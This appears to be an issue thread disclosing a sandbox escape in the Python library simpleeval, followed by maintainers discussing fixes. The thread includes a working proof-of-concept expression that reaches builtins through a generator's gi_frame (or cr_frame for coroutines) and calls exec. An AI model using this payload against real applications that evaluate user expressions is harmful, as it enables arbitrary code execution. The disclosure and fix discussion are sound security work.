Escaping the sandbox through generators

[decorator-factory]

If any of the supplied objects has a coroutine method or generator method, it's possible to run arbitrary code by supplying a specially crafted expression string.

Here's an example that works on CPython 3.11.6:

import simpleeval

class Foo:
    def bar(self):
        yield 'Hello, world!'

user_input = """
foo.bar().gi_frame.f_globals['__builtins__'].exec('raise RuntimeError("u r hacked")')
"""

simpleeval.simple_eval(user_input, names={"foo": Foo()})

this results in the RuntimeError being raised.

If Foo had an async function named bar, you'd do foo.bar().cr_frame instead.

---

Is there a good way to fix this? It's possible to blacklist the gi_* and cr_* attribute lookups, or maybe detect if eval or exec is being called when handling a Call node

[decorator-factory]

I think this is also a good example for #125: you can patch this particular hole; but simpleeval allows accessing any property by default, so there's no way to know if there are similar attributes that are easy to mistakenly give access to. (Maybe the next Python version adds a new property to functions, or generators, or some other built-in objects)

[danthedeckie]

100%. We need to switch with 2.0.

This should be fixed in 1.0.0